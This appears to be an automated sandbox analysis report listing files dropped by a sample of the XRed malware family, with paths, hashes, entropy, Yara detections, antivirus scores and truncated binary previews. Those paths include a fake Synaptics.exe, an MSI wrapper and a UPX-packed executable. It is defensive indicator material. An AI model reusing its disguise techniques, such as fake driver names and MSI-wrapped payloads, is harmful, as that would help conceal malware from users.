                                                                                                        MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                        SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                        SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                        SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                        Malicious:false
                                                                                                        Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                        C:\Users\user\Documents\~$AFWAAFRXKO.xlsx

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):165
                                                                                                        Entropy (8bit):1.3520167401771568
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qs/FFyGff:qsyWf
                                                                                                        MD5:5C22367453CA7CD5BD7CA96C4FD55742
                                                                                                        SHA1:FC7428D064740B4E331D57098AF028AA26FBC1AE
                                                                                                        SHA-256:F5D3D989BFAC7CF7187B3665F8CB75AF84FD749DBE245E454E2F9F1AC562E543
                                                                                                        SHA-512:BE2C202040245F25CB24C7F7B44A69F0000A95984236C3AE671443C56A7E1AE05BD7ACED71979ADF1159490770A767D25F581E76540C9C653441558BAECC0C89
                                                                                                        Malicious:false
                                                                                                        Preview:.user ..t.i.n.a. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                        C:\Users\user\Documents\~$cache1

                                                                                                        Download File
                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):771584
                                                                                                        Entropy (8bit):6.6408899377896855
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Imr:ansJ39LyjbJkQFMhmC+6GD9p
                                                                                                        MD5:7103F3EEC43BBABE34068295157F9F1C
                                                                                                        SHA1:A35D73E54E4BA166AC30889F57FA58284881102A
                                                                                                        SHA-256:2B6DB5563D77C827F5A662CB0A05359450DB29948863F9A5556C19CE14D05305
                                                                                                        SHA-512:F8A257ABA57A1EACF8F280651E74F97D2E14F326139282ABB506764C95FB57DB9C4708BAFD1AC027B030C40A866BE2BD04B3B0BFAC82F748B147E8A17DBD7188
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: KOGJZW.exe, Detection: malicious, Browse
                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                        C:\Windows\Installer\63d57e.msi

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, MSI Installer, Code page: 1252, Last Printed: Fri Sep 21 10:56:09 2012, Create Time/Date: Fri Sep 21 10:56:09 2012, Name of Creating Application: Windows Installer, Title: Exe to msi converter free, Author: www.exetomsi.com, Template: ;0, Last Saved By: devuser, Revision Number: {C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}, Last Saved Time/Date: Tue May 21 12:56:44 2013, Number of Pages: 100, Number of Words: 0, Security: 0
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1757184
                                                                                                        Entropy (8bit):7.442319740969341
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:49152:+EJnsHyjtk2MYC5GDChloJfWJ255hpB14Rd:1nsmtk2arhlTJ23h
                                                                                                        MD5:51DD5767DE678BB6359CBB175319F0EC
                                                                                                        SHA1:76AE487DDA6CF3651A9B2B30614C0FEFD1F3149C
                                                                                                        SHA-256:5A49F64634AC29F37B3E53F5A1E37B90E8F3A385683F24083C68AEE092408314
                                                                                                        SHA-512:FFB798290E2F6840EB8F0587DC675E8654589BFD070B1C54E49C7984272AA94DA3A493CBD28B1DDDEF1F6A44B09AD9FD8A14EC0D77B90F948DC85089F91CC8A0
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Windows\Installer\63d57e.msi, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Windows\Installer\63d57e.msi, Author: Joe Security
                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Windows\Installer\MSID6D6.tmp

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1730258
                                                                                                        Entropy (8bit):7.489581382934968
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:49152:ynsHyjtk2MYC5GDChloJfWJ255hpB14RdG:ynsmtk2arhlTJ23hf
                                                                                                        MD5:34A89FE73E294D1CF5655E99480E97B9
                                                                                                        SHA1:D7671E3F47650188FBE5599A9E524984B775B966
                                                                                                        SHA-256:DFA7121756A6CAB67FA1FBEF8D5EF8B2BE5A52A32BA491AD0659D07DC8645FCD
                                                                                                        SHA-512:FA35541693618EB9E31A802AAE3A01FB30CADA33C37A390F6DD216F12F80B6FC270390AD0310D159C52001A771066DCAFE4D9FD1D89C81EAB11C68ECD6071FE8
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Windows\Installer\MSID6D6.tmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Windows\Installer\MSID6D6.tmp, Author: Joe Security
                                                                                                        Preview:...@IXOS.@.....@&..Y.@.....@.....@.....@.....@.....@......&.{29EF7317-DCA1-4159-97B2-C883AD400AC6}..Exe to msi converter free..xyxmml.msi.@.....@.....@.....@........&.{C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}.....@.....@.....@.....@.......@.....@.....@.......@......Exe to msi converter free......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{4C231858-2B39-11D3-8E0D-00C04F6837D0}...@.......@.....@.....@........RemoveODBC..Removing ODBC components..T....@....T....@......%._B3D13F97_1369_417D_A477_B4C42B829328....J.%._B3D13F97_1369_417D_A477_B4C42B829328.@.......d..MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..............................

                                                                                                        C:\Windows\Installer\MSID754.tmp

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1729536
                                                                                                        Entropy (8bit):7.489873659196219
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:49152:snsHyjtk2MYC5GDChloJfWJ255hpB14RdZ:snsmtk2arhlTJ23hg
                                                                                                        MD5:1D2237FAF8E6198625010CB580280901
                                                                                                        SHA1:592449BDDF763BB63C22F638CB42F71484F87F06
                                                                                                        SHA-256:78643B903379276085C5EF0092AFC5C10DEE821C5754E01BC8EF835907B16AC4
                                                                                                        SHA-512:8ABE1FF967D92C663080CAF54F315E534EA296C91474D66CD327DCCC38A3AA8685101649BB120E28F1438011596DDE4F2F83E8150C90D51529EFCE9906A5AA0B
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Windows\Installer\MSID754.tmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Windows\Installer\MSID754.tmp, Author: Joe Security
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                        C:\Windows\Installer\SourceHash{29EF7317-DCA1-4159-97B2-C883AD400AC6}

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                        Category:dropped
                                                                                                        Size (bytes):20480
                                                                                                        Entropy (8bit):1.1628581993880864
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:JSbX72FjgAGiLIlHVRpth/7777777777777777777777777vDHFLYIJa1pSl0i8Q:JqQI5plpJabF
                                                                                                        MD5:E5F3D2DE4CBCB0DDD2A49BDD62D7F771
                                                                                                        SHA1:6206DB78ED1A4D9EF3B922478975A914AA52AC7D
                                                                                                        SHA-256:D47ECA810641ED1444D498D9E40A763BE29B95DFAA027254DC8A219E434E3FCC
                                                                                                        SHA-512:1D531B0A2EEC03DD56836322DE883E68905E1CDF35D9F94F994D81F28E9969FDBE0C1B8DC81A801FEC4DF4CA77CF62B6AAB4963BB751EB29E82FE88311702C33
                                                                                                        Malicious:false
                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                        Category:dropped
                                                                                                        Size (bytes):20480
                                                                                                        Entropy (8bit):1.416672635633971
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:JpO38Phbuh3iFip1GE2yza2t4KAQBHodagUMClXtOVt+HipVJ+ZVqKwGlrk/ipVA:M8PhbuRc06WXOCnT5QtGSzUgssSzfTl
                                                                                                        MD5:005AE12E11C27381B759AD9F9AA04B8C
                                                                                                        SHA1:90EDC433DD864CB01E246509D73A2217E06DBCCA
                                                                                                        SHA-256:973B9F9AFAFF26077C289233ACB78C4ABB725CB805E95795422900B68E668672
                                                                                                        SHA-512:1FE504437839CF37D549678642A4C0BAB622E227F7CE241B142D4DD53A3C09B8C07180A9833F0706B2B66BD784521EF752BDFA6F6EF62E2B44C00BBB66F06233
                                                                                                        Malicious:false
                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):360001
                                                                                                        Entropy (8bit):5.362960859505823
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaul:zTtbmkExhMJCIpEw
                                                                                                        MD5:408A48636C82B75F3E04889C83F32D77
                                                                                                        SHA1:002BC2F55D49E82D5A0C81568D67E26477660FD5
                                                                                                        SHA-256:76B844F8EDA6F65DB55342A41C7E34D4C5B3A4337E3A764D32D7F71A56F00CA1
                                                                                                        SHA-512:15B3CDA905902218F779D6D0D1CDE235A0ECAFBF90B0DB54211E184E12056637205DFA152C61DADB55FA4024CC58EE1FF2A9C69005F3B4A6D2A41ADBDD0C230A
                                                                                                        Malicious:false
                                                                                                        Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                                                                        C:\Windows\SysWOW64\._cache_MSID754.tmp

                                                                                                        Download File
                                                                                                        Process:C:\Windows\Installer\MSID754.tmp
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                        Category:dropped
                                                                                                        Size (bytes):957952
                                                                                                        Entropy (8bit):7.875620970115749
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:xhloDX0XOf4nBz255HblZJgfKRjO45P1NGRdEx:xhloJfWJ255hpB14Rd
                                                                                                        MD5:A1D37A2A0A4CD5038E129946EE935868
                                                                                                        SHA1:87042FBECF1558A2E974C6AD045584F23E1AC7C9
                                                                                                        SHA-256:9988B0297AD8BE4BD3C559437176EACA54CDC36593728967395C4DEE21FC898C
                                                                                                        SHA-512:EB6CFCC7B1C526C06737DC6187AF4F65BDD178FFC951CF8BB13571B44CC2C3C0CD051C6E9B4930433F8E6830420A04E0B538D353DD86A1FEFB0663032C37C03C
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...u.Jg.........."......P...`....................@..........................@ ...........@...@.......@......................1 .$........Q...................5 .........................................H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc....`.......V...H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

                                                                                                        C:\Windows\Temp\~DF14646B96C22279DE.TMP

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):512
                                                                                                        Entropy (8bit):0.0
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3::
                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                        Malicious:false
                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Windows\Temp\~DF2AB6BCA70755BB8D.TMP

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                        Category:dropped
                                                                                                        Size (bytes):32768
                                                                                                        Entropy (8bit):1.1461440853710205
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:JhNhx36Dux6Zi7riptk2xza2t4hA3ZdagUMClXtW5Vt+HipVJ+ZVqKwGlrk/ipVA:56DuQZsrMLFXOxT5+tGSzUgssSzfTl
                                                                                                        MD5:8C42BC6A427841EC6B19C98D02C5282E
                                                                                                        SHA1:2B4AA61405E356C979B6722136ED967AD9EED88F
                                                                                                        SHA-256:D53F48DD19293B88EFE4355CF63E7E3E35C69E0A8F5F005375F31BCADC1FC2A6
                                                                                                        SHA-512:74DFB273561B041D83AA5DAE4DB61A457B0F43C2ABEBC063EDDEC050846E76CD576FB6E0FC3174FA21DA1B9418EFAC4546608107FC94B26CD69A82B460931285
                                                                                                        Malicious:false
                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Windows\Temp\~DF2BCDF53E9C6A2F53.TMP

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):512
                                                                                                        Entropy (8bit):0.0
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3::
                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                        Malicious:false
                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Windows\Temp\~DF38A15C1363BF3F3A.TMP

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                        Category:dropped
                                                                                                        Size (bytes):20480
                                                                                                        Entropy (8bit):1.416672635633971
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:JpO38Phbuh3iFip1GE2yza2t4KAQBHodagUMClXtOVt+HipVJ+ZVqKwGlrk/ipVA:M8PhbuRc06WXOCnT5QtGSzUgssSzfTl
                                                                                                        MD5:005AE12E11C27381B759AD9F9AA04B8C
                                                                                                        SHA1:90EDC433DD864CB01E246509D73A2217E06DBCCA
                                                                                                        SHA-256:973B9F9AFAFF26077C289233ACB78C4ABB725CB805E95795422900B68E668672
                                                                                                        SHA-512:1FE504437839CF37D549678642A4C0BAB622E227F7CE241B142D4DD53A3C09B8C07180A9833F0706B2B66BD784521EF752BDFA6F6EF62E2B44C00BBB66F06233
                                                                                                        Malicious:false
                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Windows\Temp\~DF434082139CBB5F82.TMP

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                        Category:dropped
                                                                                                        Size (bytes):32768
                                                                                                        Entropy (8bit):1.1461440853710205
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:JhNhx36Dux6Zi7riptk2xza2t4hA3ZdagUMClXtW5Vt+HipVJ+ZVqKwGlrk/ipVA:56DuQZsrMLFXOxT5+tGSzUgssSzfTl
                                                                                                        MD5:8C42BC6A427841EC6B19C98D02C5282E
                                                                                                        SHA1:2B4AA61405E356C979B6722136ED967AD9EED88F
                                                                                                        SHA-256:D53F48DD19293B88EFE4355CF63E7E3E35C69E0A8F5F005375F31BCADC1FC2A6
                                                                                                        SHA-512:74DFB273561B041D83AA5DAE4DB61A457B0F43C2ABEBC063EDDEC050846E76CD576FB6E0FC3174FA21DA1B9418EFAC4546608107FC94B26CD69A82B460931285
                                                                                                        Malicious:false
                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Windows\Temp\~DF48EAF8063433270E.TMP

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                        Category:dropped
                                                                                                        Size (bytes):20480
                                                                                                        Entropy (8bit):1.416672635633971
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:JpO38Phbuh3iFip1GE2yza2t4KAQBHodagUMClXtOVt+HipVJ+ZVqKwGlrk/ipVA:M8PhbuRc06WXOCnT5QtGSzUgssSzfTl
                                                                                                        MD5:005AE12E11C27381B759AD9F9AA04B8C
                                                                                                        SHA1:90EDC433DD864CB01E246509D73A2217E06DBCCA
                                                                                                        SHA-256:973B9F9AFAFF26077C289233ACB78C4ABB725CB805E95795422900B68E668672
                                                                                                        SHA-512:1FE504437839CF37D549678642A4C0BAB622E227F7CE241B142D4DD53A3C09B8C07180A9833F0706B2B66BD784521EF752BDFA6F6EF62E2B44C00BBB66F06233
                                                                                                        Malicious:false
                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Windows\Temp\~DF77AC6A0DF33CD928.TMP

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):512
                                                                                                        Entropy (8bit):0.0
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3::
                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                        Malicious:false
                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Windows\Temp\~DFAAFC5EE3E3D4EEEA.TMP

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):32768
                                                                                                        Entropy (8bit):0.069255428085079
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOLYIJaiQVky6lS:2F0i8n0itFzDHFLYIJaUS
                                                                                                        MD5:A46A1AA7DFB906DC1803B8C059E5BDF3
                                                                                                        SHA1:3F3F26B055D51B3118D093246A1D2AC799638B5A
                                                                                                        SHA-256:FB54EE3A88DC789A0AF56D6BCEB9261B4668E6BE1A925D9E6954129AAED03263
                                                                                                        SHA-512:8E1D133C96B1D565C71126C933C857E99621B9475CEB82009077BA39E334EAAA8321FE281305CF0CD34FFD2287B986409A3E9DF62DD8D77265B02FBB88E156F2
                                                                                                        Malicious:false
                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Windows\Temp\~DFB2A1AEDC9D99D86B.TMP

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):512
                                                                                                        Entropy (8bit):0.0
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3::
                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                        Malicious:false
                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Windows\Temp\~DFCB00999D22DD477E.TMP

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                        Category:dropped
                                                                                                        Size (bytes):32768
                                                                                                        Entropy (8bit):1.1461440853710205
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:JhNhx36Dux6Zi7riptk2xza2t4hA3ZdagUMClXtW5Vt+HipVJ+ZVqKwGlrk/ipVA:56DuQZsrMLFXOxT5+tGSzUgssSzfTl
                                                                                                        MD5:8C42BC6A427841EC6B19C98D02C5282E
                                                                                                        SHA1:2B4AA61405E356C979B6722136ED967AD9EED88F
                                                                                                        SHA-256:D53F48DD19293B88EFE4355CF63E7E3E35C69E0A8F5F005375F31BCADC1FC2A6
                                                                                                        SHA-512:74DFB273561B041D83AA5DAE4DB61A457B0F43C2ABEBC063EDDEC050846E76CD576FB6E0FC3174FA21DA1B9418EFAC4546608107FC94B26CD69A82B460931285
                                                                                                        Malicious:false
                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Windows\Temp\~DFD57CAF0C15C45E0E.TMP

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):512
                                                                                                        Entropy (8bit):0.0
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3::
                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                        Malicious:false
                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Windows\Temp\~DFE59441C0F7560F9F.TMP

                                                                                                        Download File
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):69632
                                                                                                        Entropy (8bit):0.0854248871978261
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:5wW2syASCl/2/tvb+ipVJ+8lqipVJ+soVjOM0JIiWlIC1nD2tpqsA5GnmnuPoo+V:ZPA1vb+ipVJ+dipVJ+ZVqKwGlrkT+2
                                                                                                        MD5:BDF8019AAC368A7666E008D38E78F8DA
                                                                                                        SHA1:E88F74105FFB8782BA376B6005C1670E17930DF2
                                                                                                        SHA-256:E8AB243B2B71B2799BCAFF5E7E8583AF6687BD9D7902C729E0924376EB7F1ECB
                                                                                                        SHA-512:2EDAAD025800A81DC91850619D0C8B97FB1B67D877560F1DE002110DF951807F4AB2E3E125C7888FADEF8F8165BA1DC1D055B9034087F26374512500640B2395
                                                                                                        Malicious:false
                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1835008
                                                                                                        Entropy (8bit):4.3941582604010305
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:Cl4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNASOBSqa:S4vF0MYQUMM6VFYSSU
                                                                                                        MD5:1480B71C844E3BC0D8390698400458C3
